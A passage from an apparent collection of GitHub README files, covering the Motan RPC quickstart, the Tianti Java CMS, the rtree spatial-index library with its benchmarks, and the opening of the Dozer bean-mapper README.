http://api.weibo.com/schema/motan.xsd"> <!-- service implementation bean --> <bean id="serviceImpl" class="quickstart.FooServiceImpl" /> <!-- exporting service by motan --> <motan:service interface="quickstart.FooService" ref="serviceImpl" export="8002" /> </beans> ``` `src/main/java/quickstart/Server.java` ```java package quickstart; import org.springframework.context.ApplicationContext; import org.springframework.context.support.ClassPathXmlApplicationContext; public class Server { public static void main(String[] args) throws InterruptedException { ApplicationContext applicationContext = new ClassPathXmlApplicationContext("classpath:motan_server.xml"); System.out.println("server start..."); } } ``` Execute main function in Server will start a motan server listening on port 8002. 4. Create and start RPC Client. `src/main/resources/motan_client.xml` ```xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:motan="http://api.weibo.com/schema/motan" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd http://api.weibo.com/schema/motan http://api.weibo.com/schema/motan.xsd"> <!-- reference to the remote service --> <motan:referer id="remoteService" interface="quickstart.FooService" directUrl="localhost:8002"/> </beans> ``` `src/main/java/quickstart/Client.java` ```java package quickstart; import org.springframework.context.ApplicationContext; import org.springframework.context.support.ClassPathXmlApplicationContext; public class Client { public static void main(String[] args) throws InterruptedException { ApplicationContext ctx = new ClassPathXmlApplicationContext("classpath:motan_client.xml"); FooService service = (FooService) ctx.getBean("remoteService"); System.out.println(service.hello("motan")); } } ``` Execute main function in Client will invoke the remote service and print response. ## Asynchronous calls 1. Based on the `Synchronous calls` example, add `@MotanAsync` annotation to interface `FooService`. ```java package quickstart; import com.weibo.api.motan.transport.async.MotanAsync; @MotanAsync public interface FooService { public String hello(String name); } ``` 2. Include the plugin into the POM file to set `target/generated-sources/annotations/` as source folder. ```xml <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>build-helper-maven-plugin</artifactId> <version>1.10</version> <executions> <execution> <phase>generate-sources</phase> <goals> <goal>add-source</goal> </goals> <configuration> <sources> <source>${project.build.directory}/generated-sources/annotations</source> </sources> </configuration> </execution> </executions> </plugin> ``` 3. Modify the attribute `interface` of referer in `motan_client.xml` from `FooService` to `FooServiceAsync`. ```xml <motan:referer id="remoteService" interface="quickstart.FooServiceAsync" directUrl="localhost:8002"/> ``` 4. Start asynchronous calls. ```java public static void main(String[] args) { ApplicationContext ctx = new ClassPathXmlApplicationContext(new String[] {"classpath:motan_client.xml"}); FooServiceAsync service = (FooServiceAsync) ctx.getBean("remoteService"); // sync call System.out.println(service.hello("motan")); // async call ResponseFuture future = service.helloAsync("motan async "); System.out.println(future.getValue()); // multi call ResponseFuture future1 = service.helloAsync("motan async multi-1"); ResponseFuture future2 = service.helloAsync("motan async multi-2"); System.out.println(future1.getValue() + ", " + future2.getValue()); // async with listener FutureListener listener = new FutureListener() { @Override public void operationComplete(Future future) throws Exception { System.out.println("async call " + (future.isSuccess() ? "success! value:" + future.getValue() : "fail! exception:" + future.getException().getMessage())); } }; ResponseFuture future3 = service.helloAsync("motan async multi-1"); ResponseFuture future4 = service.helloAsync("motan async multi-2"); future3.addListener(listener); future4.addListener(listener); } ``` # Documents - [Wiki](https://github.com/weibocom/motan/wiki) - [Wiki(中文)](https://github.com/weibocom/motan/wiki/zh_overview) # Contributors - maijunsheng([@maijunsheng](https://github.com/maijunsheng)) - fishermen([@hustfisher](https://github.com/hustfisher)) - TangFulin([@tangfl](https://github.com/tangfl)) - bodlyzheng([@bodlyzheng](https://github.com/bodlyzheng)) - jacawang([@jacawang](https://github.com/jacawang)) - zenglingshu([@zenglingshu](https://github.com/zenglingshu)) - Sugar Zouliu([@lamusicoscos](https://github.com/lamusicoscos)) - tangyang([@tangyang](https://github.com/tangyang)) - olivererwang([@olivererwang](https://github.com/olivererwang)) - jackael([@jackael9856](https://github.com/jackael9856)) - Ray([@rayzhang0603](https://github.com/rayzhang0603)) - r2dx([@half-dead](https://github.com/half-dead)) - Jake Zhang([sunnights](https://github.com/sunnights)) - axb([@qdaxb](https://github.com/qdaxb)) - wenqisun([@wenqisun](https://github.com/wenqisun)) - fingki([@fingki](https://github.com/fingki)) - 午夜([@sumory](https://github.com/sumory)) - guanly([@guanly](https://github.com/guanly)) - Di Tang([@tangdi](https://github.com/tangdi)) - 肥佬大([@feilaoda](https://github.com/feilaoda)) - 小马哥([@andot](https://github.com/andot)) - wu-sheng([@wu-sheng](https://github.com/wu-sheng)) &nbsp;&nbsp;&nbsp; _Assist Motan to become the first Chinese RPC framework on [OpenTracing](http://opentracing.io) **Supported Frameworks List**_ - Jin Zhang([@lowzj](https://github.com/lowzj)) - xiaoqing.yuanfang([@xiaoqing-yuanfang](https://github.com/xiaoqing-yuanfang)) - 东方上人([@dongfangshangren](https://github.com/dongfangshangren)) - Voyager3([@xxxxzr](https://github.com/xxxxzr)) - yeluoguigen009([@yeluoguigen009](https://github.com/yeluoguigen009)) - Michael Yang([@yangfuhai](https://github.com/yangfuhai)) - Panying([@anylain](https://github.com/anylain)) # License Motan is released under the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0). [maven]:https://maven.apache.org [gradle]:http://gradle.org [consul]:http://www.consul.io [zookeeper]:http://zookeeper.apache.org
0
xujeff/tianti
java轻量级的CMS解决方案-天梯。天梯是一个用java相关技术搭建的后台CMS解决方案,用户可以结合自身业务进行相应扩展,同时提供了针对dao、service等的代码生成工具。技术选型:Spring Data JPA、Hibernate、Shiro、 Spring MVC、Layer、Mysql等。
cms hibernate java layer mysql shiro spring-data-jpa spring-mvc
# 天梯(tianti) [天梯](https://yuedu.baidu.com/ebook/7a5efa31fbd6195f312b3169a45177232f60e487)[tianti-tool](https://github.com/xujeff/tianti-tool)简介:<br> 1、天梯是一款使用Java编写的免费的轻量级CMS系统,目前提供了从后台管理到前端展现的整体解决方案。 2、用户可以不编写一句代码,就制作出一个默认风格的CMS站点。 3、前端页面自适应,支持PC和H5端,采用前后端分离的机制实现。后端支持天梯蓝和天梯红换肤功能。 4、项目技术分层明显,用户可以根据自己的业务模块进行相应地扩展,很方便二次开发。  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/tiantiframework.png) <br>  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/help/help.png) <br> 技术架构:<br> 1、技术选型: 后端 ·核心框架:Spring Framework 4.2.5.RELEASE ·安全框架:Apache Shiro 1.3.2 ·视图框架:Spring MVC 4.2.5.RELEASE ·数据库连接池:Tomcat JDBC ·缓存框架:Ehcache ·ORM框架:Spring Data JPA、hibernate 4.3.5.Final ·日志管理:SLF4J 1.7.21、Log4j ·编辑器:ueditor ·工具类:Apache Commons、Jackson 2.8.5、POI 3.15 ·view层:JSP ·数据库:mysql、oracle等关系型数据库 前端 ·dom : Jquery ·分页 : jquery.pagination ·UI管理 : common ·UI集成 : uiExtend ·滚动条 : jquery.nicescroll.min.js ·图表 : highcharts ·3D图表 :highcharts-more ·轮播图 : jquery-swipe ·表单提交 :jquery.form ·文件上传 :jquery.uploadify ·表单验证 :jquery.validator ·展现树 :jquery.ztree ·html模版引擎 :template 2、项目结构: 2.1、tianti-common:系统基础服务抽象,包括entity、dao和service的基础抽象; 2.2、tianti-org:用户权限模块服务实现; 2.3、tianti-cms:资讯类模块服务实现; 2.4、tianti-module-admin:天梯后台web项目实现; 2.5、tianti-module-interface:天梯接口项目实现; 2.6、tianti-module-gateway:天梯前端自适应项目实现(是一个静态项目,调用tianti-module-interface获取数据);    前端项目概览:<br> PC:<br> ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/index.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/columnlist.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/detail.png)   H5:<br> ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/index.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/columnlist.png)   ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/detail.png)   <br> 后台项目概览:<br> 天梯登陆页面: ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/login.png)   天梯蓝风格(默认): ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/userlist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/rolelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/menulist.png)                           ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/roleset.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/updatePwd.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/skin.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/lanmulist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addlanmu.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/articlelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addarticle.png) 天梯红风格: ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/userlist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/rolelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/menulist.png)                           ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/roleSet.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/updatePwd.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/skin.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/lanmulist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addlanmu.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/articlelist.png) ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addarticle.png)
0
davidmoten/rtree
Immutable in-memory R-tree and R*-tree implementations in Java with reactive api
null
rtree ========= <a href="https://github.com/davidmoten/rtree/actions/workflows/ci.yml"><img src="https://github.com/davidmoten/rtree/actions/workflows/ci.yml/badge.svg"/></a><br/> [![Coverity Scan](https://scan.coverity.com/projects/4762/badge.svg?flat=1)](https://scan.coverity.com/projects/4762?tab=overview)<br/> [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree/badge.svg?style=flat)](https://maven-badges.herokuapp.com/maven-central/com.github.davidmoten/rtree)<br/> [![codecov](https://codecov.io/gh/davidmoten/rtree/branch/master/graph/badge.svg)](https://codecov.io/gh/davidmoten/rtree) In-memory immutable 2D [R-tree](http://en.wikipedia.org/wiki/R-tree) implementation in java using [RxJava Observables](https://github.com/ReactiveX/RxJava) for reactive processing of search results. Status: *released to Maven Central* Note that the **next version** (without a reactive API and without serialization) is at [rtree2](https://github.com/davidmoten/rtree2). An [R-tree](http://en.wikipedia.org/wiki/R-tree) is a commonly used spatial index. This was fun to make, has an elegant concise algorithm, is thread-safe, fast, and reasonably memory efficient (uses structural sharing). The algorithm to achieve immutability is cute. For insertion/deletion it involves recursion down to the required leaf node then recursion back up to replace the parent nodes up to the root. The guts of it is in [Leaf.java](src/main/java/com/github/davidmoten/rtree/internal/LeafDefault.java) and [NonLeaf.java](src/main/java/com/github/davidmoten/rtree/internal/NonLeafDefault.java). [Backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) support required some complexity because effectively a bookmark needed to be kept for a position in the tree and returned to later to continue traversal. An immutable stack containing the node and child index of the path nodes came to the rescue here and recursion was abandoned in favour of looping to prevent stack overflow (unfortunately java doesn't support tail recursion!). Maven site reports are [here](http://davidmoten.github.io/rtree/index.html) including [javadoc](http://davidmoten.github.io/rtree/apidocs/index.html). Features ------------ * immutable R-tree suitable for concurrency * Guttman's heuristics (Quadratic splitter) ([paper](https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB8QFjAA&url=http%3A%2F%2Fpostgis.org%2Fsupport%2Frtree.pdf&ei=ieEQVJuKGdK8uATpgoKQCg&usg=AFQjCNED9w2KjgiAa9UI-UO_0eWjcADTng&sig2=rZ_dzKHBHY62BlkBuw3oCw&bvm=bv.74894050,d.c2E)) * R*-tree heuristics ([paper](http://dbs.mathematik.uni-marburg.de/publications/myPapers/1990/BKSS90.pdf)) * Customizable [splitter](src/main/java/com/github/davidmoten/rtree/Splitter.java) and [selector](src/main/java/com/github/davidmoten/rtree/Selector.java) * 10x faster index creation with STR bulk loading ([paper](https://www.researchgate.net/profile/Scott_Leutenegger/publication/3686660_STR_A_Simple_and_Efficient_Algorithm_for_R-Tree_Packing/links/5563368008ae86c06b676a02.pdf)). * search returns [```Observable```](http://reactivex.io/RxJava/javadoc/rx/Observable.html) * search is cancelled by unsubscription * search is ```O(log(n))``` on average * insert, delete are ```O(n)``` worst case * all search methods return lazy-evaluated streams offering efficiency and flexibility of functional style including functional composition and concurrency * balanced delete * uses structural sharing * supports [backpressure](https://github.com/ReactiveX/RxJava/wiki/Backpressure) * JMH benchmarks * visualizer included * serialization using [FlatBuffers](http://github.com/google/flatbuffers) * high unit test [code coverage](http://davidmoten.github.io/rtree/cobertura/index.html) * R*-tree performs 900,000 searches/second returning 22 entries from a tree of 38,377 Greek earthquake locations on i7-920@2.67Ghz (maxChildren=4, minChildren=1). Insert at 240,000 entries per second. * requires java 1.6 or later Number of points = 1000, max children per node 8: | Quadratic split | R*-tree split | STR bulk loaded | | :-------------: | :-----------: | :-----------: | | <img src="src/docs/quad-1000-8.png?raw=true" /> | <img src="src/docs/star-1000-8.png?raw=true" /> | <img src="src/docs/str-1000-8.png?raw=true" /> | Notice that there is little overlap in the R*-tree split compared to the Quadratic split. This should provide better search performance (and in general benchmarks show this). STR bulk loaded R-tree has a bit more overlap than R*-tree, which affects the search performance at some extent. Getting started ---------------- Add this maven dependency to your pom.xml: ```xml <dependency> <groupId>com.github.davidmoten</groupId> <artifactId>rtree</artifactId> <version>VERSION_HERE</version> </dependency> ``` ### Instantiate an R-Tree Use the static builder methods on the ```RTree``` class: ```java // create an R-tree using Quadratic split with max // children per node 4, min children 2 (the threshold // at which members are redistributed) RTree<String, Geometry> tree = RTree.create(); ``` You can specify a few parameters to the builder, including *minChildren*, *maxChildren*, *splitter*, *selector*: ```java RTree<String, Geometry> tree = RTree.minChildren(3).maxChildren(6).create(); ``` ### Geometries The following geometries are supported for insertion in an RTree: * `Rectangle` * `Point` * `Circle` * `Line` ### Generic typing If for instance you know that the entry geometry is always ```Point``` then create an ```RTree``` specifying that generic type to gain more type safety: ```java RTree<String, Point> tree = RTree.create(); ``` ### R*-tree If you'd like an R*-tree (which uses a topological splitter on minimal margin, overlap area and area and a selector combination of minimal area increase, minimal overlap, and area): ``` RTree<String, Geometry> tree = RTree.star().maxChildren(6).create(); ``` See benchmarks below for some of the performance differences. ### Add items to the R-tree When you add an item to the R-tree you need to provide a geometry that represents the 2D physical location or extension of the item. The ``Geometries`` builder provides these factory methods: * ```Geometries.rectangle``` * ```Geometries.circle``` * ```Geometries.point``` * ```Geometries.line``` (requires *jts-core* dependency) To add an item to an R-tree: ```java RTree<T,Geometry> tree = RTree.create(); tree = tree.add(item, Geometries.point(10,20)); ``` or ```java tree = tree.add(Entries.entry(item, Geometries.point(10,20)); ``` *Important note:* being an immutable data structure, calling ```tree.add(item, geometry)``` does nothing to ```tree```, it returns a new ```RTree``` containing the addition. Make sure you use the result of the ```add```! ### Remove an item in the R-tree To remove an item from an R-tree, you need to match the item and its geometry: ```java tree = tree.delete(item, Geometries.point(10,20)); ``` or ```java tree = tree.delete(entry); ``` *Important note:* being an immutable data structure, calling ```tree.delete(item, geometry)``` does nothing to ```tree```, it returns a new ```RTree``` without the deleted item. Make sure you use the result of the ```delete```! ### Geospatial geometries (lats and longs) To handle wraparounds of longitude values on the earth (180/-180 boundary trickiness) there are special factory methods in the `Geometries` class. If you want to do geospatial searches then you should use these methods to build `Point`s and `Rectangle`s: ```java Point point = Geometries.pointGeographic(lon, lat); Rectangle rectangle = Geometries.rectangleGeographic(lon1, lat1, lon2, lat2); ``` Under the covers these methods normalize the longitude value to be in the interval [-180, 180) and for rectangles the rightmost longitude has 360 added to it if it is less than the leftmost longitude. ### Custom geometries You can also write your own implementation of [```Geometry```](src/main/java/com/github/davidmoten/rtree/geometry/Geometry.java). An implementation of ```Geometry``` needs to specify methods to: * check intersection with a rectangle (you can reuse the distance method here if you want but it might affect performance) * provide a minimum bounding rectangle * implement ```equals``` and ```hashCode``` for consistent equality checking * measure distance to a rectangle (0 means they intersect). Note that this method is only used for search within a distance so implementing this method is *optional*. If you don't want to implement this method just throw a ```RuntimeException```. For the R-tree to be well-behaved, the distance function if implemented needs to satisfy these properties: * ```distance(r) >= 0 for all rectangles r``` * ```if rectangle r1 contains r2 then distance(r1)<=distance(r2)``` * ```distance(r) = 0 if and only if the geometry intersects the rectangle r``` ### Searching The advantage of an R-tree is the ability to search for items in a region reasonably quickly. On average search is ```O(log(n))``` but worst case is ```O(n)```. Search methods return ```Observable``` sequences: ```java Observable<Entry<T, Geometry>> results = tree.search(Geometries.rectangle(0,0,2,2)); ``` or search for items within a distance from the given geometry: ```java Observable<Entry<T, Geometry>> results = tree.search(Geometries.rectangle(0,0,2,2),5.0); ``` To return all entries from an R-tree: ```java Observable<Entry<T, Geometry>> results = tree.entries(); ``` Search with a custom geometry ----------------------------------- Suppose you make a custom geometry like ```Polygon``` and you want to search an ```RTree<String,Point>``` for points inside the polygon. This is how you do it: ```java RTree<String, Point> tree = RTree.create(); Func2<Point, Polygon, Boolean> pointInPolygon = ... Polygon polygon = ... ... entries = tree.search(polygon, pointInPolygon); ``` The key is that you need to supply the ```intersects``` function (```pointInPolygon```) to the search. It is on you to implement that for all types of geometry present in the ```RTree```. This is one reason that the generic ```Geometry``` type was added in *rtree* 0.5 (so the type system could tell you what geometry types you needed to calculate intersection for) . Search with a custom geometry and maxDistance -------------------------------------------------- As per the example above to do a proximity search you need to specify how to calculate distance between the geometry you are searching and the entry geometries: ```java RTree<String, Point> tree = RTree.create(); Func2<Point, Polygon, Boolean> distancePointToPolygon = ... Polygon polygon = ... ... entries = tree.search(polygon, 10, distancePointToPolygon); ``` Example -------------- ```java import com.github.davidmoten.rtree.RTree; import static com.github.davidmoten.rtree.geometry.Geometries.*; RTree<String, Point> tree = RTree.maxChildren(5).create(); tree = tree.add("DAVE", point(10, 20)) .add("FRED", point(12, 25)) .add("MARY", point(97, 125)); Observable<Entry<String, Point>> entries = tree.search(Geometries.rectangle(8, 15, 30, 35)); ``` Searching by distance on lat longs ------------------------------------ See [LatLongExampleTest.java](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example. The example depends on [*grumpy-core*](https://github.com/davidmoten/grumpy) artifact which is also on Maven Central. Another lat long example searching geo circles ------------------------------------------------ See [LatLongExampleTest.testSearchLatLongCircles()](src/test/java/com/github/davidmoten/rtree/LatLongExampleTest.java) for an example of searching circles around geographic points (using great circle distance). What do I do with the Observable thing? ------------------------------------------- Very useful, see [RxJava](http://github.com/ReactiveX/RxJava). As an example, suppose you want to filter the search results then apply a function on each and reduce to some best answer: ```java import rx.Observable; import rx.functions.*; import rx.schedulers.Schedulers; Character result = tree.search(Geometries.rectangle(8, 15, 30, 35)) // filter for names alphabetically less than M .filter(entry -> entry.value() < "M") // get the first character of the name .map(entry -> entry.value().charAt(0)) // reduce to the first character alphabetically .reduce((x,y) -> x <= y ? x : y) // subscribe to the stream and block for the result .toBlocking().single(); System.out.println(list); ``` output: ``` D ``` How to configure the R-tree for best performance -------------------------------------------------- Check out the benchmarks below and refer to [another benchmark results](https://github.com/ambling/rtree-benchmark#results), but I recommend you do your own benchmarks because every data set will behave differently. If you don't want to benchmark then use the defaults. General rules based on the benchmarks: * for data sets of <10,000 entries use the default R-tree (quadratic splitter with maxChildren=4) * for data sets of >=10,000 entries use the star R-tree (R*-tree heuristics with maxChildren=4 by default) * use STR bulk loaded R-tree (quadratic splitter or R*-tree heuristics) for large (where index creation time is important) or static (where insertion and deletion are not frequent) data sets Watch out though, the benchmark data sets had quite specific characteristics. The 1000 entry dataset was randomly generated (so is more or less uniformly distributed) and the *Greek* dataset was earthquake data with its own clustering characteristics. What about memory use? ------------------------ To minimize memory use you can use geometries that store single precision decimal values (`float`) instead of double precision (`double`). Here are examples: ```java // create geometry using double precision Rectangle r = Geometries.rectangle(1.0, 2.0, 3.0, 4.0); // create geometry using single precision Rectangle r = Geometries.rectangle(1.0f, 2.0f, 3.0f, 4.0f); ``` The same creation methods exist for `Circle` and `Line`. How do I just get an Iterable back from a search? --------------------------------------------------------- If you are not familiar with the Observable API and want to skip the reactive stuff then here's how to get an ```Iterable``` from a search: ```java Iterable<T> it = tree.search(Geometries.point(4,5)) .toBlocking().toIterable(); ``` Backpressure ----------------- The backpressure slow path may be enabled by some RxJava operators. This may slow search performance by a factor of 3 but avoids possible out of memory errors and thread starvation due to asynchronous buffering. Backpressure is benchmarked below. Visualizer -------------- To visualize the R-tree in a PNG file of size 600 by 600 pixels just call: ```java tree.visualize(600,600) .save("target/mytree.png"); ``` The result is like the images in the Features section above. Visualize as text -------------------- The ```RTree.asString()``` method returns output like this: ``` mbr=Rectangle [x1=10.0, y1=4.0, x2=62.0, y2=85.0] mbr=Rectangle [x1=28.0, y1=4.0, x2=34.0, y2=85.0] entry=Entry [value=2, geometry=Point [x=29.0, y=4.0]] entry=Entry [value=1, geometry=Point [x=28.0, y=19.0]] entry=Entry [value=4, geometry=Point [x=34.0, y=85.0]] mbr=Rectangle [x1=10.0, y1=45.0, x2=62.0, y2=63.0] entry=Entry [value=5, geometry=Point [x=62.0, y=45.0]] entry=Entry [value=3, geometry=Point [x=10.0, y=63.0]] ``` Serialization ------------------ Release 0.8 includes [flatbuffers](https://github.com/google/flatbuffers) support as a serialization format and as a lower performance but lower memory consumption (approximately one third) option for an RTree. The greek earthquake data (38,377 entries) when placed in a default RTree with `maxChildren=10` takes up 4,548,133 bytes in memory. If that data is serialized then reloaded into memory using the `InternalStructure.FLATBUFFERS_SINGLE_ARRAY` option then the RTree takes up 1,431,772 bytes in memory (approximately one third the memory usage). Bear in mind though that searches are much more expensive (at the moment) with this data structure because of object creation and gc pressures (see benchmarks). Further work would be to enable direct searching of the underlying array without object creation expenses required to match the current search routines. As of 5 March 2016, indicative RTree metrics using flatbuffers data structure are: * one third the memory use with log(N) object creations per search * one third the speed with backpressure (e.g. if `flatMap` or `observeOn` is downstream) * one tenth the speed without backpressure Note that serialization uses an optional dependency on `flatbuffers`. Add the following to your pom dependencies: ```xml <dependency> <groupId>com.google.flatbuffers</groupId> <artifactId>flatbuffers-java</artifactId> <version>2.0.3</version> <optional>true</optional> </dependency> ``` ## Serialization example Write an `RTree` to an `OutputStream`: ```java RTree<String, Point> tree = ...; OutputStream os = ...; Serializer<String, Point> serializer = Serializers.flatBuffers().utf8(); serializer.write(tree, os); ``` Read an `RTree` from an `InputStream` into a low-memory flatbuffers based structure: ```java RTree<String, Point> tree = serializer.read(is, lengthBytes, InternalStructure.SINGLE_ARRAY); ``` Read an `RTree` from an `InputStream` into a default structure: ```java RTree<String, Point> tree = serializer.read(is, lengthBytes, InternalStructure.DEFAULT); ``` Dependencies --------------------- As of 0.7.5 this library does not depend on *guava* (>2M) but rather depends on *guava-mini* (11K). The `nearest` search used to depend on `MinMaxPriorityQueue` from guava but now uses a backport of Java 8 `PriorityQueue` inside a custom `BoundedPriorityQueue` class that gives about 1.7x the throughput as the guava class. How to build ---------------- ``` git clone https://github.com/davidmoten/rtree.git cd rtree mvn clean install ``` How to run benchmarks -------------------------- Benchmarks are provided by ``` mvn clean install -Pbenchmark ``` Coverity scan ---------------- This codebase is scanned by Coverity scan whenever the branch `coverity_scan` is updated. For the project committers if a coverity scan is desired just do this: ```bash git checkout coverity_scan git pull origin master git push origin coverity_scan ``` ### Notes The *Greek* data referred to in the benchmarks is a collection of some 38,377 entries corresponding to the epicentres of earthquakes in Greece between 1964 and 2000. This data set is used by multiple studies on R-trees as a test case. ### Results These were run on i7-920 @2.67GHz with *rtree* version 0.8-RC7: ``` Benchmark Mode Cnt Score Error Units defaultRTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 262260.993 ± 2767.035 ops/s defaultRTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 296264.913 ± 2836.358 ops/s defaultRTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 135118.271 ± 1722.039 ops/s defaultRTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 315851.452 ± 3097.496 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 278761.674 ± 4182.761 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 315254.478 ± 4104.206 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 214509.476 ± 1555.816 ops/s defaultRTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 118094.486 ± 1118.983 ops/s defaultRTreeSearchOf1000PointsMaxChildren004 thrpt 10 1122140.598 ± 8509.106 ops/s defaultRTreeSearchOf1000PointsMaxChildren010 thrpt 10 569779.807 ± 4206.544 ops/s defaultRTreeSearchOf1000PointsMaxChildren032 thrpt 10 238251.898 ± 3916.281 ops/s defaultRTreeSearchOf1000PointsMaxChildren128 thrpt 10 702437.901 ± 5108.786 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 462243.509 ± 7076.045 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 326395.724 ± 1699.043 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 156978.822 ± 1993.372 ops/s defaultRTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 68267.160 ± 929.236 ops/s rStarTreeDeleteOneEveryOccurrenceFromGreekDataChildren010 thrpt 10 211881.061 ± 3246.693 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren004 thrpt 10 187062.089 ± 3005.413 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren010 thrpt 10 186767.045 ± 2291.196 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren032 thrpt 10 37940.625 ± 743.789 ops/s rStarTreeInsertOneEntryInto1000EntriesMaxChildren128 thrpt 10 151897.089 ± 674.941 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren004 thrpt 10 237708.825 ± 1644.611 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren010 thrpt 10 229577.905 ± 4234.760 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren032 thrpt 10 78290.971 ± 393.030 ops/s rStarTreeInsertOneEntryIntoGreekDataEntriesMaxChildren128 thrpt 10 6521.010 ± 50.798 ops/s rStarTreeSearchOf1000PointsMaxChildren004 thrpt 10 1330510.951 ± 18289.410 ops/s rStarTreeSearchOf1000PointsMaxChildren010 thrpt 10 1204347.202 ± 17403.105 ops/s rStarTreeSearchOf1000PointsMaxChildren032 thrpt 10 576765.468 ± 8909.880 ops/s rStarTreeSearchOf1000PointsMaxChildren128 thrpt 10 1028316.856 ± 13747.282 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren004 thrpt 10 904494.751 ± 15640.005 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010 thrpt 10 649636.969 ± 16383.786 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffers thrpt 10 84230.053 ± 1869.345 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010FlatBuffersBackpressure thrpt 10 36420.500 ± 1572.298 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren010WithBackpressure thrpt 10 116970.445 ± 1955.659 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren032 thrpt 10 224874.016 ± 14462.325 ops/s rStarTreeSearchOfGreekDataPointsMaxChildren128 thrpt 10 358636.637 ± 4886.459 ops/s searchNearestGreek thrpt 10 3715.020 ± 46.570 ops/s ``` There is a related project [rtree-benchmark](https://github.com/ambling/rtree-benchmark) that presents a more comprehensive benchmark with results and analysis on this rtree implementation.
0
DozerMapper/dozer
Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another.
null
[![Build, Test and Analyze](https://github.com/DozerMapper/dozer/actions/workflows/build.yml/badge.svg)](https://github.com/DozerMapper/dozer/actions/workflows/build.yml) [![Release Version](https://img.shields.io/maven-central/v/com.github.dozermapper/dozer-core.svg?maxAge=2592000)](https://mvnrepository.com/artifact/com.github.dozermapper/dozer-core) [![License](https://img.shields.io/hexpm/l/plug.svg?maxAge=2592000)]() # Dozer ## Project Activity The project is currently not active and will more than likely be deprecated in the future. If you are looking to use Dozer on a greenfield project, we would discourage that. If you have been using Dozer for a while, we would suggest you start to think about migrating onto another library, such as: - [mapstruct](https://github.com/mapstruct/mapstruct) - [modelmapper](https://github.com/modelmapper/modelmapper) For those moving to mapstruct, the community has created a [Intellij plugin](https://plugins.jetbrains.com/plugin/20853-dostruct) that can help with the migration. ## Why Map? A mapping framework is useful in a layered architecture where you are creating layers of abstraction by encapsulating changes to particular data objects vs. propagating these objects to other layers (i.e. external service data objects, domain objects, data transfer objects, internal service data objects). Mapping between data objects has traditionally been addressed by hand coding value object assemblers (or converters) that copy data between the objects. Most programmers will develop some sort of custom mapping framework and spend countless hours and thousands of lines of code mapping to and from their different data object. This type of code for such conversions is rather boring to write, so why not do it automatically? ## What is Dozer? Dozer is a Java Bean to Java Bean mapper that recursively copies data from one object to another, it is an open source mapping framework that is robust, generic, flexible, reusable, and 